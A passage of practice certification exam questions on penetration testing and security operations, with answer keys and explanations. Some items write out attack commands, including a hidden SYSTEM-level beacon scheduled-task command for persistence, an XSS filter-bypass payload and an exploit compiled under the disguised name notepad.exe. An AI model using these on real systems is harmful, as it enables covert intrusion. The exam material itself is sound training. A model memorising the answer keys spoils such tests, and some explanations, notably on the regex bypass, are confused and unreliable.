OBJ-5.3: This is an example of a Boolean-based SQL injection. This occurs when data input by a user is interpreted as a SQL command rather than as normal data by the backend database. In this example, notice that the statement being parsed as part of the URL after the equal sign is equivalent to 1 or 17-7=10. This means the portion of the statement that is 17-7=10 would return a value of 1 (since it is true). Then, we are left to compute if 1 = 1, and since it does, the SQL database will treat this as a positive authentication. This is simply an obfuscation technique of a 1=1 SQL injection technique. A buffer overflow is an exploit that attempts to write data to a buffer and exceed that buffer's boundary to overwrite an adjacent memory location. A session hijacking attack consists of exploiting the web session control mechanism, normally managed for a session token. XML Injection is an attack technique used to manipulate or compromise an XML application or service's logic.
45
Praveen is currently investigating activity from an attacker who compromised a host on the network. The individual appears to have used credentials belonging to a janitor. After breaching the system, the attacker entered some unrecognized commands with very long text strings and then began using the sudo command to carry out actions. What type of attack has just taken place?
A. Privilege escalation
B. Phishing
C. Social engineering
D. Session hijacking
A. Privilege escalation
Explanation
OBJ-5.2: The use of long query strings points to a buffer overflow attack, and the sudo command confirms the elevated privileges after the attack. This indicates a privilege escalation has occurred. While the other three options may have been used as an initial access vector, they cannot be confirmed based on the question's details. Only a privilege escalation is currently verified within the scenario due to the use of sudo.
46
Riaan's company runs critical web applications. During a vulnerability scan, Riaan found a serious SQL injection vulnerability in one of their web applications. The system cannot be taken offline to remediate the vulnerability. Which of the following compensating controls should Riaan recommend using until the system can be remediated?
A. IPS
B. WAF
C. Vulnerability scanning
D. Encryption
B. WAF
Explanation
OBJ-5.3: WAF (web application firewall) is the best option since it can serve as a compensating control and protect against web application vulnerabilities like an SQL injection until the application can be fully remediated. Vulnerability scanning could only be used to detect the issue. Therefore, it is a detective control, not a compensating control. Encryption would not be effective in stopping an SQL injection. An IPS is designed to protected network devices based on ports, protocols, and signatures. It would not be effective against an SQL injection and is not considered a compensating control for this vulnerability.
47
Lamont is in the process of debugging a software program. As he examines the code, he discovers that it is miswritten. Due to the error, the code does not validate a variable's size before allowing the information to be written into memory. Based on Lamont’s discovery, what type of attack might occur?
A. SQL injection
B. Cross-site scripting
C. Malicious logic
D. Buffer overflow
D. Buffer overflow
Explanation
OBJ-5.2: A buffer overflow occurs when a program or process tries to store more data in a buffer (temporary data storage area) than it was intended to hold. Since buffers are created to contain a finite amount of data, the extra information can cause an overflow into adjacent buffers, corrupting or overwriting the valid data held in them. Although it may occur accidentally through programming error, buffer overflow is an increasingly common security attack on data integrity. In buffer overflow attacks, the extra data may contain codes designed to trigger specific actions, in effect sending new instructions to the attacked computer that could, for example, damage the user's files, change data, or disclose confidential information. Programs should use the variable size validation before writing the data to memory to ensure that the variable can fit into the buffer to prevent this type of attack.
48
You are conducting a penetration test against an organization. You created an evil twin of their wireless network. Many of the organization's laptops are now connected to your evil twin access point. You want to capture all of the victim's web browsing traffic in an unencrypted format during your attack. Which of the following exploits should you utilize to meet this goal?
A. Perform a deauthentication attack
B. Perform an SSL downgrade attack
C. Perform a man-in-the-middle attack
D. Perform an SSL stripping attack
D. Perform an SSL stripping attack
Explanation
OBJ-6.1: An SSL stripping attack, also known as an HTTP downgrade attack, forces the client to communicate with the webserver in plain text (unencrypted) over HTTP instead of HTTPS. Both SSL downgrade and SSL stripping attacks are used to force the victim into using a weaker encryption mechanism (SSL downgrade to SSL-based HTTPS) or no encryption (SSL stripping to HTTP) for its web traffic.
49
You have been contracted to conduct a wireless penetration test for a corporate client. Which of the following should be documented and agreed upon in the scoping documents before you begin your assessment?
A. The make and model of the wireless access points used by the client
B. The number of wireless access points and devices used by the client
C. The frequencies of the wireless access points and devices used by the client
D. The network diagrams with the SSIDs of the wireless access points used by the client
C. The frequencies of the wireless access points and devices used by the client
Explanation
OBJ-6.1: To ensure you are not accidentally targeting another organization's wireless infrastructure during your penetration test, you should have the frequencies of the wireless access points and devices used by the client documented in the scoping documents. This would include whether your clients use Wireless A, B, G, N, or AC and if they are using the 2.4 GHz or 5.0 GHz spectrum if they are using Wireless N or AC.
50
You are installing a new wireless network in your office building and want to ensure it is secure. Which of the following configurations would create the MOST secure wireless network?
A. WPA2 and AES
B. WPA and MAC filtering
C. WEP and TKIP
D. WPA2 and RC4
A. WPA2 and AES
Explanation
OBJ-6.1: The most secure wireless network configuration utilizes WPA2 with AES encryption. WPA2 is the most secure wireless encryption standard, as it has replaced both WPA and WEP. AES is a robust encryption algorithm that is used by default in the WPA2 standard.
51
Your smartphone begins to receive unsolicited messages while eating lunch at the restaurant across the street from your office. What might cause this to occur?
A. Packet sniffing
B. Bluesnarfing
C. Bluejacking
D. Geotagging
C. Bluejacking
Explanation
OBJ-6.1: Bluejacking sends unsolicited messages over Bluetooth to Bluetooth-enabled devices such as smartphones and tablets. On the other hand, Bluesnarfing involves taking data from a smartphone or tablet over Bluetooth without permission. Bluetooth has a limited range, so the attacker is likely within 10 meters of the victimized device. Geotagging involves embedded the geolocation coordinates into a piece of data (normally a photo or video). Packet sniffing is a passive method of collecting network traffic for follow-on analysis at a later time.
52
During a recent penetration test, it was discovered that your company's wireless network could be reached from the parking lot. The Chief Security Officer has submitted a change request to your network engineering team to solve this issue because he wants to ensure that the wireless network is only accessible from within the building. Based on these requirements, which of the following settings should be changed to ensure the wireless signal doesn't extend beyond your building's interior while maintaining a high level of availability to your users?
A. Power level
B. Channel
C. Frequency
D. Encryption
A. Power level
Explanation
OBJ-6.1: The power level should be reduced for the radio transmitter in the wireless access points. With a reduced power level, the signal will not travel as far, which can ensure the signal remains within the building's interior only. The other options, if changed, would affect the availability of the network to the currently configured users and their devices.
53
You are conducting a physical penetration test against an organization. You followed an employee to the coffee shop next door, and while they were ordering, you got within 1 foot of them to electronically capture their proximity badge. Which of the following exploits are you planning to use?
A. Session hijacking
B. Bluesnarfing
C. RFID cloning
D. Credential harvesting
C. RFID cloning
Explanation
OBJ-6.1: Radio-frequency identification (RFID) is a standard for identifying and keeping track of an object's physical location through the use of radio waves. RFID cloning is the act of copying authentication data from an RFID badge's microchip to another badge. In an attack scenario, badge cloning is useful because it enables the attacker to obtain authorization credentials without actually stealing a physical badge from the organization. Badge cloning can be done through handheld RFID writers, which are inexpensive and easy to use. You simply hold the badge up to the RFID writer device, press a button to copy its tag's data, then hold a blank badge up to the device and write the copied data. RFID cloning tools can read the data like any normal RFID reader would and be located up to several feet away or inside a bag.
54
Which attack utilizes a wireless access point made to look as if it belongs to the network to eavesdrop on the wireless traffic?
A. Evil twin
B. Rogue access point
C. WEP attack
D. Wardriving
A. Evil twin
Explanation
OBJ-6.1: An evil twin is meant to mimic a legitimate hotspot provided by a nearby business, such as a coffee shop that provides free Wi-Fi access to its patrons. The evil twin is the wireless LAN equivalent of the phishing scam. This type of attack may be used to steal the passwords of unsuspecting users by monitoring their connections or phishing, which involves setting up a fraudulent web site and luring people there.
55
You are conducting a wireless penetration test against an organization. During your attack, you created an evil twin of their wireless network. Many of the organization's laptops are now connected to your evil twin access point. Which of the following exploits should you utilize next to gather credentials from the victims browsing the internet through your access point?
A. Fragmentation attack
B. Deauthentication attack
C. Karma attack
D. Downgrade attack
D. Downgrade attack
Explanation
OBJ-6.1: A downgrade attack forces a client to use a weaker SSL version that the attacker can crack. Since the devices are connected through your access point, you can establish a weaker SSL-based HTTPS connection between their web browser and the actual web server they wanted. This forcing of the client to use a weaker version is known as a downgrade attack, and it allows the attacker to capture the packets and later crack them offline since SSL-based HTTPS is weak enough to crack due to vulnerabilities in its design.
56
Which of the following is the biggest weakness with ICS and SCADA systems in a network?
A. Cybersecurity experts don't know how to secure ICS/SCADA
B. These systems are difficult to retofit with modern security
C. ICS/SCADA must be connected to the internet to function
D. They are patched using standard vendor OS patches
B. These systems are difficult to retofit with modern security
Explanation
OBJ-7.2: Industrial control system (ICS) and supervisory control and data acquisition (SCADA) systems were developed many years before security standards were established and integrated into their design. Many of these older systems date back to the 1970s and are still in use today. Over time, these systems were incorporated into the organization's TCP/IP data networks, which provides a huge exploitation area by penetration testers and attackers alike. Many ICS and SCADA vendors are slow to implement security measures since they cannot be easily retrofitted with the newer security required. Therefore, ICS and SCADA systems should ALWAYS be isolated from production networks and segmented into their own logical network. For example, some ICS/SCADA systems use a proprietary operating system. More modern ICS/SCADA operates using a version of Windows. However, many still use Windows XP, making them much more vulnerable since they cannot be upgraded to Windows 10 without hardware replacement.
57
Sarah is conducting a penetration test against Dion Training's Windows-based network. This engagement aims to simulate an advanced persistent threat and demonstrate persistence for 30 days without their system administrators identifying the intrusion. Which of the following commands should Sarah use to run a script that beacons back to her computer every 20 minutes?
A. schtasks /create /tn beacon /tr C:\temp\beacon.bat /sc MINUTE /mo 20 /ru SYSTEM
B. (crontab -l ; echo "*/20 * * * * /tmp/beacon")| crontab -
C. schtasks /create /tn beacon /tr /tmp/beacon /sc MINUTE /mo 20 /ru SYSTEM
D. (crontab -l ; echo "* */20 * * * /tmp/beacon")| crontab -
A. schtasks /create /tn beacon /tr C:\temp\beacon.bat /sc MINUTE /mo 20 /ru SYSTEM
Explanation
OBJ-3.2: A scheduled task or scheduled job is an instance of execution, like initiating a process or running of a script, that the system performs on a set schedule. Once the task executes, it can prompt the user for interaction or run silently in the background; it all depends on what the task is set up to do. Scheduled tasks in Windows use the schtasks command. The correct answer for this persistence is to enter the command "schtasks /create /tn beacon /tr C:\temp\beacon.bat /sc MINUTE /mo 20 /ru SYSTEM" that will create a task called "beacon" that runs the script at "C:\temp\beacon.bat every 20 minutes as the SYSTEM level user. The other variant of schtasks is incorrect because it used a Linux-based file directory structure to reference the script location and would fail to run in Windows. The crontab options are used in Linux, not in Windows.
58
A user has reported that their workstation is running very slowly. A technician begins to investigate the issue and notices a lot of unknown processes running in the background. The technician determines that the user has recently downloaded a new application from the internet and may have become infected with malware. Which of the following types of infections does the workstation MOST likely have?
A. Rootkit
B. Keylogger
C. Trojan
D. Ransomware
C. Trojan
Explanation
OBJ-3.3: A trojan is a type of malware that looks legitimate but can take control of your computer. A Trojan is designed to damage, disrupt, steal, or in general, inflict some other harmful action on your data or network. The most common form of a trojan is a Remote Access Trojan (RAT), which allows an attacker to control a workstation or steal information remotely. To operate, a trojan will create numerous processes that run in the background of the system.
59
Dion Training has applied a new Group Policy to all student accounts that will lock out any account in which the student enters their password incorrectly 3 times in a row. Once the account is locked out, the student must wait 15 minutes before they can attempt to log in again. What type of attack is this mitigation strategy trying to prevent?
A. Privilege escalation
B. Brute force attack
C. Spoofing
D. Man-in-the-Middle
B. Brute force attack
Explanation
OBJ-3.2: Since the policy will lockout the student for 15 minutes between attempts, it is a valid mitigation technique against a brute force attack. By extending the waiting period, the attacker's brute force attempts are less effective.
60
Your network security manager wants a monthly report of the security posture of all the assets on the network (e.g., workstations, servers, routers, switches, firewalls). The report should include any feature of a system or appliance that is missing a security patch, OS update, or other essential security feature and its risk severity. Which solution would work best to find this data?
A. Security policy
B. Penetration test
C. Virus scan
D. Vulnerability scanner
D. Vulnerability scanner
Explanation
OBJ-3.1: A vulnerability scanner is a computer program designed to assess computers, computer systems, networks, or applications for weaknesses. Most vulnerability scanners also create an itemized report of their findings after the scan.
61
Jennifer decided that the licensing cost for a piece of video editing software was too expensive. Instead, she decided to download a keygen program to generate her own license key and install a pirated version of the editing software. After she runs the keygen, a license key is created, but her system performance becomes very sluggish, and her antimalware suite begins to display numerous alerts. Which type of malware might her computer be infected with?
A. Worm
B. Trojan
C. Adware
D. Logic bomb
B. Trojan
Explanation
OBJ-3.3: A trojan is a program in which malicious or harmful code is contained inside an apparently harmless program. In this example, the harmless program is the key generator (which does create a license key). It also has malicious code inside it (causing the additional alerts from the antimalware solution). Likely, this keygen has an embedded virus or remote access trojan (RAT) in its programming.
62
Which of the following open source tools a penetration tester to conduct vulnerability scans against a company's infrastructure?
A. Peach
B. Wireshark
C. OpenVAS
D. CeWL
C. OpenVAS
Explanation
OBJ-3.1: OpenVAS (Open Vulnerability Assessment System) is an open-source software framework for vulnerability scanning and management that can scan for vulnerabilities, misconfigurations, default passwords, and susceptibility to denial of service (DoS) attacks. Wireshark is an open-source network protocol analyzer used to sniff many traffic types, re-create entire TCP sessions, and capture copies of files transmitted on the network. Peach is a dynamic application security testing tool used to conduct fuzzing. CeWL is a Ruby app that crawls websites to generate word lists that can be used with password crackers such as John the Ripper.
63
A cybersecurity analyst is applying for a new job with a penetration testing firm. He received the job application as a secured Adobe PDF file, but unfortunately, the firm locked the file with a password so the potential employee cannot fill in the application. Instead of asking for an unlocked copy of the document, the analyst decides to write a script in Python to attempt to unlock the PDF file by using passwords from a list of commonly used passwords until he can find the correct password or attempts every password in his list. Based on this description, what kind of cryptographic attack did the analyst perform?
A. Man-in-the-middle attack
B. Brute-force attack
C. Dictionary attack
D. Session hijacking
C. Dictionary attack
Explanation
OBJ-3.2: A dictionary attack is a technique for defeating a cipher or authentication mechanism by trying to determine its decryption key or passphrase by trying hundreds or sometimes millions of likely possibilities, such as words in a dictionary. The key to answering this question is that they were using passwords from a list. In cryptography, a brute-force attack consists of an attacker submitting many passwords or passphrases with the hope of eventually guessing correctly. A dictionary attack is a specific form of a brute-force attack that uses a list. A session hijacking attack compromises the session token by stealing or predicting a valid session token to gain unauthorized access to the webserver. A man-in-the-middle attack (MITM), also known as a hijack attack, is an attack where the attacker secretly relays and possibly alters the communications between two parties who believe that they are directly communicating with each other.
64
What kind of security vulnerability would a newly discovered flaw in a software application be considered?
A. Input validation flaw
B. HTTP header injection vulnerability
C. Zero-day vulnerability
D. Time-to-check to time-to-use flaw
C. Zero-day vulnerability
Explanation
OBJ-3.3: A zero-day vulnerability refers to a hole in software unknown to the vendor and newly discovered. This security hole can become exploited by hackers before the vendor becomes aware of it and can fix it. An input validation attack is any malicious action against a computer system that involves manually entering strange information into a normal user input field that is successful due to an input validation flaw. HTTP header injection vulnerabilities occur when user input is insecurely included within server response headers. The time of check to time of use is a class of software bug caused by changes in a system between checking a condition (such as a security credential) and using the check's results and the difference in time passed. This is an example of a race condition.
65
Which of the following techniques does a vulnerability scanner use to detect a vulnerability on a specific service?
A. Port scanning
B. Banner grabbing
C. Fuzzing
D. Analyzing the response received from the service when probed
D. Analyzing the response received from the service when probed
Explanation
OBJ-3.1: When a vulnerability scanner analyzes the response received from services during a scan or probe, it can determine if the vulnerability exists on the given service on a particular host. Port Scanning is the name for the technique used to identify open ports and services available on a network host. Fuzzing or fuzz testing is an automated software testing technique that involves providing invalid, unexpected, or random data as inputs to a computer program. Banner grabbing is a technique used to gain information about a computer system on a network and the services running on its open ports.
66
You are working as a penetration tester and have discovered a new method of exploiting a vulnerability within the Windows 10 operating system. You conduct some research online and discover that a security patch against this particular vulnerability doesn't exist yet. Which type of threat would this BEST be categorized as?
A. Zero-day
B. DDOS
C. Brute force
D. Spoofing
A. Zero-day
Explanation
OBJ-3.3: A zero-day attack happens once that flaw, or software/hardware vulnerability, is exploited, and attackers release malware before a developer has an opportunity to create a patch to fix the vulnerability, hence the term zero-day.
67
Which of the following vulnerability scans would provide the best results if you want to determine if the target's configuration settings are correct?
A. Non-credentialed scan
B. Credentialed scan
C. External scan
D. Internal scan
B. Credentialed scan
Explanation
OBJ-3.1: Credentialed scans log into a system and retrieve their configuration information. Therefore, it should provide you with the best results. Non-credentialed scans rely on external resources for configuration settings that can be altered or incorrect. The scanner's network location does not directly impact the ability to read the configuration information, so it would not make a difference if you conducted an external or internal scan.
68
Jason is conducting a physical penetration test against a company. His objective is to enter the server room that is protected by a lock using a fingerprint reader. Jason attempts to use his finger to open the lock several times without success. He then turns his finger 45 degrees to the left, and the lock authenticates him. What is MOST likely the reason the lock opened?
A. The crossover error rate is tuned towards true negatives
B. The biometric lock is set to fail open after five invalid attempts
C. The biometric lock is set to fail closed after five invalid attempts
D. The crossover error rate is tuned towards false positives
D. The crossover error rate is tuned towards false positives
Explanation
OBJ-3.2: A biometric lock is difficult to bypass unless the installer incorrectly configures it. If the biometric lock has a high false acceptance rate, it will allow unauthorized people to open the door. The crossover error rate (CER) is the point where the false acceptance and false rejection rates are equal. When charted on a graph, this point can lean more towards accepting false positives or rejecting true positives. If it leans more towards accepting false positives, the sensitivity has decreased to allow less frustration for its users.
69
You are logged into the Windows command prompt and want to find what systems are alive in a portion of a Class B network (172.16.0.0/24) using ICMP. What command would best accomplish this?
A. ping 172.16.0.0
B. ping 172.16.0.255
C. for %X in (1 1 255) do PING 172.16.0.%X
D. for /L %X in (1 1 254) do PING -n 1 172.16.0.%X | FIND /I "Reply"
D. for /L %X in (1 1 254) do PING -n 1 172.16.0.%X | FIND /I "Reply"
Explanation
OBJ-3.2: The Windows command line does support some fundamental scripting, as shown in this answer. Use an iterative variable to set the starting value (start#) and then step through a set range of values until the value exceeds the set ending value (end#). /L will execute the iterative by comparing start# with end#. If start# is less than end#, the command will execute. When the iterative variable exceeds end#, the command shell exits the loop. You can also use a negative step# to step through a range in decreasing values. For example, (1,1,5) generates the sequence 1 2 3 4 5 and (5,-1,1) generates the sequence (5 4 3 2 1). The syntax is: "for /L %variable in (start# step# end#) do command [CommandLineOptions]."
70
An employee contacts the service desk because they cannot open an attachment they receive in their email. The service desk agent conducts a screen sharing session with the user and investigates the issue. The agent notices that the attached file is named Invoice1043.pdf, and a black pop-up window appears and then disappears quickly when the attachment was double-clicked. Which of the following is most likely causing this issue?
A. The user doesn't have a PDF reader installed on their computer
B. The attachment is using a double file extension to mask its identity
C .The file contains an embedded link to a malicious website
D .The email is a form of spam and should be deleted
B. The attachment is using a double file extension to mask its identity
Explanation
OBJ-3.3: The message contains a file attachment hoping that the user will execute or open it. The attachment's nature might be disguised by formatting tricks such as using a double file extension, such as Invoice1043.pdf.exe, where the user only sees the first extension since .exe is a known file type in Windows. This would explain the black popup window that appears and then disappeared, especially if the exe file was running a command-line tool. This file is most likely not a PDF, so there is no need for a PDF reader. Additionally, most modern web browsers, such as Chrome and Edge, can open PDF files by default for the user. The file would not contain an embedded link since an embedded link is another popular attack vector that embeds a link to a malicious site within the email body, not within the file. This email is likely not spam and would be better categorized as a phishing attempt instead.
71
During your annual cybersecurity awareness training in your company, the instructor states that employees should be careful about what information they post on social media. According to the instructor, if you post too much personal information on social media, such as your name, birthday, hometown, and other personal details, it is much easier for an attacker to conduct which type of attack to break your passwords?
A. Birthday attack
B. Brute force attack
C. Cognitive password attack
D. Rainbow table attack
C. Cognitive password attack
Explanation
OBJ-3.2: A cognitive password is a form of knowledge-based authentication that requires a user to answer a question, presumably something they intrinsically know, to verify their identity. If you post a lot of personal information about yourself online, this password type can easily be bypassed. For example, during the 2008 elections, Vice Presidential candidate Sarah Palin's email account was hacked because a high schooler used the "reset my password" feature on Yahoo's email service to reset her password using the information that was publically available about Sarah Palin (like her birthday, high school, and other such information).
72
Which of the protocols listed is NOT likely to trigger a vulnerability scan alert when used to support a virtual private network (VPN)?
A. IPSec
B. SSLv2
C. PPTP
D. SSLv3
A. IPSec
Explanation
OBJ-3.1: IPSec is the most secure protocol that works with VPNs. The use of PPTP and SSL is discouraged for VPN security. Due to this, PPTP and SSL for a VPN will likely alert during a vulnerability scan as an issue to be remediated.
73
A security engineer is using the Kali Linux operating system and is writing exploits in C++. What command should they use to compile their new exploit and name it notepad.exe?
A. g++ exploit.cpp -o notepad.exe
B. g++ exploit.py -o notepad.exe
C. g++ -i exploit.pl -o notepad.exe
D. g++ --compile -i exploit.cpp -o notepad.exe
A. g++ exploit.cpp -o notepad.exe
Explanation
OBJ-3.2: g++ is free C++ compiler that is available across a wide variety of operating systems, and is installed by default as part of Kali Linux. The proper syntax to compile a C++ file (*.cpp) is "g++ filename -o outputfile", so "g++ exploit.cpp -0 notepad.exe" is correct.
74
As a cybersecurity analyst conducting vulnerability scans, you have just completed your first scan of an enterprise network comprising over 10,000 workstations. As you examine your findings, you note that you have less than 1 critical finding per 100 workstations. Which of the following statement does BEST explain these results?
A. An uncredentialed scan of the network was performed
B. The network has an exceptionally strong security posture
C. The scanner failed to connect with the majority of workstations
D. The scanner was not compatible with the devices on your network
A. An uncredentialed scan of the network was performed
Explanation
OBJ-3.1: Uncredentialed scans are generally unable to detect many vulnerabilities on a device. When conducting an internal assessment, you should perform an authenticated (credentialed) scan of the environment to most accurately determine the network's vulnerability posture. In most enterprise networks, if a vulnerability exists on one machine, it also exists on most other workstations since they use a common baseline or image. If the scanner failed to connect to the workstations, an error would have been generated in the report.
75
What programming language is most vulnerable to buffer overflow attacks?
A. Swift
B. C++
C. Python
D. Java
B. C++
Explanation
OBJ-3.2: Many memory manipulation functions in C and C++ do not perform bounds checking and can easily overwrite the allocated bounds of the buffers they operate upon. Newer languages like Python, Java, and Swift do a better job of protecting against a buffer overflow, but even they are not perfect.
76
What type of malicious application does not require user intervention or another application to act as a host to replicate?
A. Macro
B. Worm
C. Trojan
D. Virus
B. Worm
Explanation
OBJ-3.3: A worm is a self-replicating type of malware that does not require user intervention or another application to act as a host for it to replicate. Viruses and Macros require user intervention to spread, and Trojans are hosted within another application that appears harmless.
77
What should a vulnerability report include if a cybersecurity analyst wants it to reflect the assets scanned accurately?
A. Processor utilization
B. Virtual hosts
C. Organizational governance
D .Log disposition
B. Virtual hosts
Explanation
OBJ-3.1: Vulnerability reports should include both the physical hosts and the virtual hosts on the target network. A common mistake of new cybersecurity analysts is to include physical hosts, thereby missing many network assets.
78
You are working as a network administrator and are worried about the possibility of an insider threat. You want to enable a security feature that would remember the Layer 2 address first connected to a particular switch port to prevent someone from unplugging a workstation from the switch port and connecting their own laptop to that same switch port. Which of the following security features would BEST accomplish this goal?
A. NAC
B. Sticky MAC
C. 802.1x
D. ACL
B. Sticky MAC
Explanation
OBJ-4.1: Persistent MAC learning, also known as Sticky MAC, is a port security feature that enables an interface to retain dynamically learned MAC addresses when the switch is restarted or if the interface goes down and is brought back online. This is a security feature that can be used to prevent someone from unplugging their office computer and connecting their own laptop to the network jack without permission since the switch port connected to that network jack would only allow the computer with the original MAC address to gain connectivity using Sticky MAC.
79
An attacker was able to gain access to your organization's network closet while posing as an HVAC technician. While he was there, he installed a network sniffer in your switched network environment. The attacker now wants to sniff all of the packets in the network. What attack should he use?
A. Fraggle
B. MAC Flood
C. Smurf
D. Tear Drop
B. MAC Flood
Explanation
OBJ-4.1: MAC flooding is a technique employed to compromise the security of switched network devices. The attack forcing legitimate MAC addresses out of the table of contents in the switch and forcing a unicast flooding behavior, potentially sending sensitive information to portions of the network where it is not normally intended to go. Essentially, since the switch table of contents is flooding with bad information, the switch could fail open and begin to act like a hub, broadcasting all the frames out of every port. This would allow the attacker to sniff all network packets since he is connected to one of those switch ports. A fraggle attack is a denial-of-service (DoS) attack that involves sending a large amount of spoofed UDP traffic to a router's broadcast address within a network. A teardrop attack is a denial-of-service (DoS) attack that involves sending fragmented TCP packets to a target machine. The Smurf attack is a distributed denial-of-service attack. Large numbers of Internet Control Message Protocol (ICMP) packets with the intended victim's spoofed source IP are broadcast to a computer network using an IP broadcast address.
80
Which device actively defends the network by detecting threats and shutting down ports or changing configurations to prevent attacks?
A. Honeypot
B. IPS
C. Firewall
D. IDS
B. IPS
Explanation
OBJ-4.5: Intrusion Protection Systems (IPS) can reconfigure themselves based on the threats experienced. Firewalls maintain a static configuration.
81
You are conducting a penetration test and planning to use a cross-site scripting attack. During your reconnaissance, you determined that the system performs input validation using REGEX to prevent any strings that contain the term "[Ss][Cc][Rr][Ii][Pp][Tt]" in the input. To bypass this input validation, which of the following variations of the script tag should you utilize? (chú thích câu A, B không có dấu cách chỗ dấu <)
A. < script>
B. < SCRIPT>
C. <$cript>
D. <%53CRIPT>
D. <%53CRIPT>
Explanation
OBJ-4.5: Since cross-site scripting (XSS) relies on < script> and < /script> HTML tags to launch, the system administrators had a good idea of creating input validation using a REGEX for those keywords. Unfortunately, they forgot to include a more inclusive version of this REGEX to catch all variants. For example, simply using [Ss][Cc][Rr][Ii][Pp][Tt] would have been much more secure, but even this would miss %53CRIPT would evade this filter. To catch all the letter S variants, you would need to use [%53%%73Ss], which includes the capital S in hex code, the lower case s in hex code, the capital S, and the lowercase s. As a penetration tester, it is important to remember that you can evade weak input validation using ASCII encoded characters, like %53 for the S character. As a cybersecurity analyst, you must build good input validations into your systems to prevent these types of attacks.
82
You want to exploit the NETBIOS name service on a Windows-based network. Which of the following tools should you use?
A. Arpspoof
B. Nessus
C. John the Ripper
D. Responder
D. Responder
Explanation
OBJ-4.4: Responder provides a fake server and relay tool that is included with Kali Linux. It responds to LLMNR, NBT-NS (NETBIOS), POP, IMAP, SMTP, and SQL queries to recover sensitive information such as user names and passwords. Responder is configured to listen for LLMNR/NBNS queries and respond with itself as the desired destination. When the client then tries to connect, it prompts the user to log on based on the client's protocol, thus harvesting the user's credentials.
83
Which of the following types of attacks occurs when an attacker attempts to gain confidential information or login credentials by sending targeted emails to a specific set of recipients within an organization?
A. Phishing
B. Zero-day
C. Spear phishing
D. Spoofing
C. Spear phishing
Explanation
OBJ-4.2: Spear phishing is the fraudulent practice of sending emails from a seemingly known or trusted sender to induce targeted individuals to reveal confidential information. The key to answering this question is that the attack was focused on a targeted set of people, not just an indiscriminate large group of random people.
84
You are working at the service desk and just received the following email from an end-user who believes it is suspicious:
***********************
From: user@diontraining.com
To: abuse@diontraining.com
Subject: You won a free iPhone!
You have won a brand new iPhone!
Just click the following link to provide your address so we can ship it out to you this afternoon: (http://www.freephone.io:8080/winner.php)
***********************
How should you classify this email?
A. Spearphishing
B. Malware
C. Phishing
D Spoofing
C. Phishing
Explanation
OBJ-4.2: This is an example of a phishing campaign. Phishing refers to obtaining user authentication or financial information through a fraudulent request for information. Phishing is specifically associated with emailing users with a link to a faked site (or some other malware that steals the information they use to try to authenticate). Spear phishing is an email or electronic communications scam targeted towards a specific individual, organization, or business. In this example, the specific user wasn't clearly targeted by their name or by their association with a particular store, company, or website.
85
While investigating a data breach, you discover that the account credentials used belonged to an employee who was fired several months ago for misusing company IT systems. Apparently, the IT department never deactivated the employee's account upon their termination. Which of the following categories would this breach be classified as?
A. Insider Threat
B. Zero-day
C. Known threat
D. Advanced persistent threat
A. Insider Threat
Explanation
OBJ-4.2: An insider threat is any current or former employee, contractor, or business partner who has or had authorized access to an organization’s network, system, or data and intentionally exceeded or misused that access in a manner that negatively affected the confidentiality, integrity, or availability of the organization’s information or information systems. Based on the details provided in the question, it appears the employee’s legitimate credentials were used to conduct the breach. This would be classified as an insider threat. A zero-day is a vulnerability in software unpatched by the developer or an attack that exploits such a vulnerability. A known threat is a threat that can be identified using a basic signature or pattern matching. An advanced persistent threat (APT) is an attacker with the ability to obtain, maintain, and diversify access to network systems using exploits and malware.
86
A client is concerned about a hacker compromising a network to gain access to confidential research data. What could be implemented to redirect any attackers on the network?
A. DMZ
B. Botnet
C. Content filter
D .Honeypot
D .Honeypot
Explanation
OBJ-4.5: A honeypot is a computer security mechanism set to detect, deflect, or in some manner counteract attempts at unauthorized use of information systems. Generally, a honeypot consists of data that appears to be a legitimate part of the site but is actually isolated and monitored and seems to contain information or a resource of value to attackers, who are then blocked.
87
You are working at the service desk as a network security technician and just received the following email from an end-user who believes a phishing campaign is being attempted.
***********************
From: user@diontraining.com
To: abuse@diontraining.com
Subject: You won a free iPhone!
Dear Susan,
You have won a brand new iPhone!
Just click the following link to provide your address so we can ship it out to you this afternoon: (http://www.freephone.io:8080/winner.php)
***********************
What should you do to prevent any other employees from accessing the link in the email above while still allowing them access to any other webpages at the domain freephone.io?
A. Add http://www.freephone.io:8080/winner.php to the browser's group policy block list
B. Add DENY TCP http://www.freephone.io ANY EQ 8080 to the firewall ACL
C. Add DENY IP ANY ANY EQ 8080 to the IPS filter
D. Add http://www.freephone.io:8080/winner.php to the load balancer
A. Add http://www.freephone.io:8080/winner.php to the browser's group policy block list
Explanation
OBJ-4.2: There are two ways to approach this question. First, you can consider which is the right answer (if you know it). By adding the full URL of the phishing link to the browser's group policy block list (or black hole list), the specific webpage will be blocked from being accessed by the employees while allowing the rest of the freephone.io domain to be accessible. Now, why not just block the entire domain? Well, maybe the rest of the domain isn't suspect, but just this one page is. (For example, maybe someone is using a legitimate site like GitHub to host their phishing campaign. Therefore you only want to block their portion of GitHub.) The second approach to answering this question would be to rule out the incorrect answers. If you used DENY TCP to the firewall ACL answer, you would block all access to the domain, blocking legitimate traffic as well as possible malicious activity. If you used the DENY IP ANY ANY to filter traffic at the IPS, you would block any IP traffic to ANY website over port 8080. If you added the link to the load balancer, this would not block it either. Therefore, we are only left with the correct answer of using a group policy in this case.
88
Mallory is unhappy with her job at a large beverage company. She decides to steal sensitive information about the company's proprietary formula for a new energy drink. She installs a keylogger onto some of the product team's workstations, which then emails out the information to her personal email account each evening so she can post the information to WikiLeaks. How would you best classify Mallory and her actions?
A. Social engineering
B. Insider threat
C. Logic bomb
D. DoS
B. Insider threat
Explanation
OBJ-4.2: Mallory is considered an insider threat in this scenario. An insider threat is a malicious threat to an organization that comes from people within the organization, such as employees, former employees, contractors or business associates, who have inside information concerning the organization's security practices, data, and computer systems. Regardless of her method of stealing the information, the key to this question resides in the fact that she is an employee of the company doing something malicious.
89
Rick is upset that he was passed over for a promotion. He decides to take revenge on his nemesis, Mary, who got the job instead of him. Rick sets up a man-in-the-middle attack against Mary's computer by redirecting any layer 2 traffic destined for the gateway to his own computer first. Rick is careful only to affect the traffic associated with Mary's computer and not the entire network. Which type of man-in-the-middle attack is Rick conducting against Mary?
A. IP spoofing
B. MAC spoofing
C. ARP cache poisoning
D. Evil twin
C. ARP cache poisoning
Explanation
OBJ-4.1: Based on the scenario, we can eliminate evil twin (focused on wireless access points) and IP spoofing (since this affects layer 3 traffic). While MAC spoofing the gateway's address might work, it would also affect every computer on this subnet. By conducting an ARP cache poisoning attack, Rick can poison the cache and replace Mary's computer's MAC association with his own, allowing him to become the man-in-the-middle between Mary and the default gateway.
90
